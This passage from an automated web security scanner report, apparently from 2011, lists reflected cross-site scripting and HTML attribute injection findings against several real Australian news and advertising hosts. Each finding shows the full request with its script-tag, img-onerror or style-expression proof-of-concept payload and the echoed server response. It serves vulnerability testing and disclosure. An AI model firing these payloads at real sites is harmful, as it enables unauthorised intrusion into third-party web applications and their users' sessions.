GET /images/sprite-widget-logos.png8a301"a%3d"b"aa15a3c938b?1315376813 HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-BUSINESS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 68
Status: 404
Vary: Accept-Encoding
Content-Length: 36592
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Wed, 07 Sep 2011 14:20:16 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie8"> <![endif]-->
<!--[if
...[SNIP]...
<link rel="canonical" href="http://mozo.com.au/images/sprite-widget-logos.png8a301"a="b"aa15a3c938b">
...[SNIP]...

2.46. http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-BUSINESS [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mozo-widgets.f2.com.au
Path:   /widgets/multiwidget3/SMH/FM-BUSINESS

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93259"a%3d"b"03e6d5a7576 was submitted in the REST URL parameter 1. This input was echoed as 93259"a="b"03e6d5a7576 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /widgets93259"a%3d"b"03e6d5a7576/multiwidget3/SMH/FM-BUSINESS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.smh.com.au/business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 64
Status: 404
Vary: Accept-Encoding
Content-Length: 36521
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Wed, 07 Sep 2011 14:19:59 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie8"> <![endif]-->
<!--[if
...[SNIP]...
<link rel="canonical" href="http://mozo.com.au/widgets93259"a="b"03e6d5a7576/multiwidget3/SMH/FM-BUSINESS">
...[SNIP]...

2.47. http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-BUSINESS [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mozo-widgets.f2.com.au
Path:   /widgets/multiwidget3/SMH/FM-BUSINESS

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7024f"a%3d"b"33aba3305a9 was submitted in the REST URL parameter 2. This input was echoed as 7024f"a="b"33aba3305a9 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /widgets/multiwidget37024f"a%3d"b"33aba3305a9/SMH/FM-BUSINESS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.smh.com.au/business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
Status: 404
Vary: Accept-Encoding
Content-Length: 36513
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Wed, 07 Sep 2011 14:20:15 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie8"> <![endif]-->
<!--[if
...[SNIP]...
<link rel="canonical" href="http://mozo.com.au/widgets/multiwidget37024f"a="b"33aba3305a9/SMH/FM-BUSINESS">
...[SNIP]...

2.48. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mozo-widgets.f2.com.au
Path:   /widgets/multiwidget3/WAT/FM-NEWS

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b47c6"a%3d"b"bc6e98538a1 was submitted in the REST URL parameter 1. This input was echoed as b47c6"a="b"bc6e98538a1 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /widgetsb47c6"a%3d"b"bc6e98538a1/multiwidget3/WAT/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 63
Status: 404
Vary: Accept-Encoding
Content-Length: 36663
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Wed, 07 Sep 2011 14:21:33 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie8"> <![endif]-->
<!--[if
...[SNIP]...
<link rel="canonical" href="http://mozo.com.au/widgetsb47c6"a="b"bc6e98538a1/multiwidget3/WAT/FM-NEWS">
...[SNIP]...

2.49. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mozo-widgets.f2.com.au
Path:   /widgets/multiwidget3/WAT/FM-NEWS

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c41da"a%3d"b"4bceb315c12 was submitted in the REST URL parameter 2. This input was echoed as c41da"a="b"4bceb315c12 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /widgets/multiwidget3c41da"a%3d"b"4bceb315c12/WAT/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.5
Status: 404
Vary: Accept-Encoding
Content-Length: 36655
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Wed, 07 Sep 2011 14:22:51 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie8"> <![endif]-->
<!--[if
...[SNIP]...
<link rel="canonical" href="http://mozo.com.au/widgets/multiwidget3c41da"a="b"4bceb315c12/WAT/FM-NEWS">
...[SNIP]...

2.50. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ndm.feeds.theplatform.com
Path:   /ps/JSON/PortalService/2.1/getReleaseList

Issue detail

The value of the PID request parameter is copied into the HTML document as plain text between tags. The payload 90e3c<img%20src%3da%20onerror%3dalert(1)>504638d47ac was submitted in the PID parameter. This input was echoed as 90e3c<img src=a onerror=alert(1)>504638d47ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ps/JSON/PortalService/2.1/getReleaseList?PID=sd_f83nBw8ui5CQcrU8nqqGqLVaIDlch90e3c<img%20src%3da%20onerror%3dalert(1)>504638d47ac&startIndex=1&endIndex=20&field=title&field=description&field=thumbnailURL&field=length&field=assets&field=PID&field=requestCount&field=contentID&field=length&field=airdate&query=categoryIDs|841970789&callback=_jqjsp HTTP/1.1
Host: ndm.feeds.theplatform.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/plain;charset=UTF-8
Date: Wed, 07 Sep 2011 14:15:59 GMT
X-Cache: MISS from feeds.theplatform.com
Via: 1.0 sea1squid01 (squid/3.0.STABLE23)
Connection: close

_jqjsp("The PID looks like it was cut-off (\"sd_f83nBw8ui5CQcrU8nqqGqLVaIDlch90e3c<img src=a onerror=alert(1)>504638d47ac\"). This PID is 76 character(s) long, when it should be 32 characters long.");

2.51. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ndm.feeds.theplatform.com
Path:   /ps/JSON/PortalService/2.1/getReleaseList

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7ac77<script>alert(1)</script>25eedfac9ac was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ps/JSON/PortalService/2.1/getReleaseList?PID=sd_f83nBw8ui5CQcrU8nqqGqLVaIDlch&startIndex=1&endIndex=20&field=title&field=description&field=thumbnailURL&field=length&field=assets&field=PID&field=requestCount&field=contentID&field=length&field=airdate&query=categoryIDs|841970789&callback=_jqjsp7ac77<script>alert(1)</script>25eedfac9ac HTTP/1.1
Host: ndm.feeds.theplatform.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: max-age=300
Expires: Wed, 07 Sep 2011 14:23:20 GMT
Content-Type: text/plain;charset=UTF-8
Date: Wed, 07 Sep 2011 14:18:19 GMT
X-Cache: MISS from feeds.theplatform.com
Via: 1.0 sea1squid03 (squid/3.0.STABLE23)
Connection: close

_jqjsp7ac77<script>alert(1)</script>25eedfac9ac({"context":"","listInfo":{"itemCount":20,"totalCount":22},"items":[{"airdate":1315379040000,"assets":[{"assetType":"Reference Image","encodingProfile":"","height":366,"URL":"http://content.video.news.
...[SNIP]...

2.52. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [endIndex parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ndm.feeds.theplatform.com
Path:   /ps/JSON/PortalService/2.1/getReleaseList

Issue detail

The value of the endIndex request parameter is copied into the HTML document as plain text between tags. The payload 50d2d<img%20src%3da%20onerror%3dalert(1)>282c5ab2dc8 was submitted in the endIndex parameter. This input was echoed as 50d2d<img src=a onerror=alert(1)>282c5ab2dc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ps/JSON/PortalService/2.1/getReleaseList?PID=sd_f83nBw8ui5CQcrU8nqqGqLVaIDlch&startIndex=1&endIndex=2050d2d<img%20src%3da%20onerror%3dalert(1)>282c5ab2dc8&field=title&field=description&field=thumbnailURL&field=length&field=assets&field=PID&field=requestCount&field=contentID&field=length&field=airdate&query=categoryIDs|841970789&callback=_jqjsp HTTP/1.1
Host: ndm.feeds.theplatform.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/plain;charset=UTF-8
Date: Wed, 07 Sep 2011 14:16:36 GMT
X-Cache: MISS from feeds.theplatform.com
Via: 1.0 sea1squid01 (squid/3.0.STABLE23)
Connection: close

_jqjsp("Illegal argument. For input string: \"2050d2d<img src=a onerror=alert(1)>282c5ab2dc8\"");

2.53. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [query parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ndm.feeds.theplatform.com
Path:   /ps/JSON/PortalService/2.1/getReleaseList

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload b5e97<img%20src%3da%20onerror%3dalert(1)>b9a0d61c0ef was submitted in the query parameter. This input was echoed as b5e97<img src=a onerror=alert(1)>b9a0d61c0ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ps/JSON/PortalService/2.1/getReleaseList?PID=sd_f83nBw8ui5CQcrU8nqqGqLVaIDlch&startIndex=1&endIndex=20&field=title&field=description&field=thumbnailURL&field=length&field=assets&field=PID&field=requestCount&field=contentID&field=length&field=airdate&query=categoryIDs|841970789b5e97<img%20src%3da%20onerror%3dalert(1)>b9a0d61c0ef&callback=_jqjsp HTTP/1.1
Host: ndm.feeds.theplatform.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/plain;charset=UTF-8
Date: Wed, 07 Sep 2011 14:18:18 GMT
X-Cache: MISS from feeds.theplatform.com
Via: 1.0 sea1squid03 (squid/3.0.STABLE23)
Connection: close

_jqjsp("Invalid ID parameter found: 841970789b5e97<img src=a onerror=alert(1)>b9a0d61c0ef");

2.54. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [startIndex parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ndm.feeds.theplatform.com
Path:   /ps/JSON/PortalService/2.1/getReleaseList

Issue detail

The value of the startIndex request parameter is copied into the HTML document as plain text between tags. The payload 8faab<img%20src%3da%20onerror%3dalert(1)>69586683c36 was submitted in the startIndex parameter. This input was echoed as 8faab<img src=a onerror=alert(1)>69586683c36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ps/JSON/PortalService/2.1/getReleaseList?PID=sd_f83nBw8ui5CQcrU8nqqGqLVaIDlch&startIndex=18faab<img%20src%3da%20onerror%3dalert(1)>69586683c36&endIndex=20&field=title&field=description&field=thumbnailURL&field=length&field=assets&field=PID&field=requestCount&field=contentID&field=length&field=airdate&query=categoryIDs|841970789&callback=_jqjsp HTTP/1.1
Host: ndm.feeds.theplatform.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/plain;charset=UTF-8
Date: Wed, 07 Sep 2011 14:16:25 GMT
X-Cache: MISS from feeds.theplatform.com
Via: 1.0 sea1squid02 (squid/3.0.STABLE23)
Connection: close

_jqjsp("Illegal argument. For input string: \"18faab<img src=a onerror=alert(1)>69586683c36\"");

2.55. http://pixel.invitemedia.com/rubicon_sync [publisher_redirecturl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /rubicon_sync

Issue detail

The value of the publisher_redirecturl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f4d5"><script>alert(1)</script>2124e81ff80 was submitted in the publisher_redirecturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rubicon_sync?publisher_user_id=f772ba986ce1d14ae944dfcb2540fa9b434bfac6&publisher_dsp_id=2101&publisher_call_type=iframe&publisher_redirecturl=http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/2f4d5"><script>alert(1)</script>2124e81ff80 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=*

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 07 Sep 2011 14:15:21 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Wed, 07-Sep-2011 14:15:01 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 264

<html><body><img width="0" height="0" src="http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/2f4d5"><script>alert(1)</script>2124e81ff80?publisher_dsp_id=2101&external_user_id=435e5758-1bdb-4563-ab69-51d400bd766e&Expiration=1315836921"/>
...[SNIP]...

2.56. http://pluck.abc.net.au/ver1.0/daapi2.api [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluck.abc.net.au
Path:   /ver1.0/daapi2.api

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload e1761<img%20src%3da%20onerror%3dalert(1)>6d23c9e6b04 was submitted in the cb parameter. This input was echoed as e1761<img src=a onerror=alert(1)>6d23c9e6b04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22Payload%22%3A%7B%22ObjectType%22%3A%22Requests.Users.UserRequest%22%2C%22UserKey%22%3A%7B%22Key%22%3A%22%22%2C%22ObjectType%22%3A%22Models.Users.UserKey%22%7D%7D%2C%22PayloadType%22%3A%22Requests.Users.UserRequest%22%7D%5D%2C%22Metadata%22%3Anull%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&cb=PluckSDK.jsonpcb('request_0')e1761<img%20src%3da%20onerror%3dalert(1)>6d23c9e6b04 HTTP/1.1
Host: pluck.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=242052946.1543285740.1315422868.1315422868.1315422868.1; __utmb=242052946.2.10.1315422868; __utmc=242052946; __utmz=242052946.1315422868.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL02WSITEMABC1proddmlocal
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 3964
Vary: Accept-Encoding
Expires: Wed, 07 Sep 2011 14:14:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:14:17 GMT
Connection: close
Set-Cookie: SiteLifeHost=SJL02WSITEMABC1proddmlocal; domain=abc.net.au; path=/

PluckSDK.jsonpcb('request_0')e1761<img src=a onerror=alert(1)>6d23c9e6b04({
"Envelopes": [
{
"PayloadType": "Responses.Users.UserResponse",
"Payload": {
"User": {
"Age": "",
"Sex": "None",
"AboutMe": "",

...[SNIP]...

2.57. http://pluck.abc.net.au/ver1.0/daapi2.api [jsonRequest parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluck.abc.net.au
Path:   /ver1.0/daapi2.api

Issue detail

The value of the jsonRequest request parameter is copied into the HTML document as plain text between tags. The payload 82bb7<img%20src%3da%20onerror%3dalert(1)>faa916c3a66 was submitted in the jsonRequest parameter. This input was echoed as 82bb7<img src=a onerror=alert(1)>faa916c3a66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22Payload%22%3A%7B%22ObjectType%22%3A%22Requests.Users.UserRequest%22%2C%22UserKey%22%3A%7B%22Key%22%3A%22%22%2C%22ObjectType%22%3A%22Models.Users.UserKey%22%7D%7D%2C%22PayloadType%22%3A%22Requests.Users.UserRequest%22%7D%5D%2C%22Metadata%22%3Anull%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D82bb7<img%20src%3da%20onerror%3dalert(1)>faa916c3a66&cb=PluckSDK.jsonpcb('request_0') HTTP/1.1
Host: pluck.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=242052946.1543285740.1315422868.1315422868.1315422868.1; __utmb=242052946.2.10.1315422868; __utmc=242052946; __utmz=242052946.1315422868.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL02WSITEMABC1proddmlocal
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1409
Vary: Accept-Encoding
Expires: Wed, 07 Sep 2011 14:14:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:14:15 GMT
Connection: close
Set-Cookie: SiteLifeHost=SJL02WSITEMABC1proddmlocal; domain=abc.net.au; path=/

PluckSDK.jsonpcb('request_0')({
"Envelopes": [
{
"PayloadType": "Responses.System.InvalidRequestExceptionResponse",
"Payload": {
"IsCachedResponse": false,
"Obj
...[SNIP]...
ests.Users.UserRequest\",\"UserKey\":{\"Key\":\"\",\"ObjectType\":\"Models.Users.UserKey\"}},\"PayloadType\":\"Requests.Users.UserRequest\"}],\"Metadata\":null,\"ObjectType\":\"Requests.RequestBatch\"}82bb7<img src=a onerror=alert(1)>faa916c3a66",
"ExceptionCode": "InvalidOrMalformedRequest",
"ExceptionLevel": "Error",
"ExceptionMessage": "Exception while deserializing request: JsonReaderException:
...[SNIP]...

2.58. http://tools.ntnews.com.au/poll/poll.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tools.ntnews.com.au
Path:   /poll/poll.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6941f"style%3d"x%3aexpression(alert(1))"5dc6096cd9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6941f"style="x:expression(alert(1))"5dc6096cd9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /poll/poll.php/6941f"style%3d"x%3aexpression(alert(1))"5dc6096cd9d HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:19:06 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n47 ( lax-agg-n30), ms lax-agg-n30 ( origin>CONN)
Cache-Control: no-cache
Content-Length: 1168
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
<form name="online-poll-form" method="post" action="/poll/poll.php/6941f"style="x:expression(alert(1))"5dc6096cd9d?">
...[SNIP]...

2.59. http://tools.themercury.com.au/feeds/feed-ticker.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
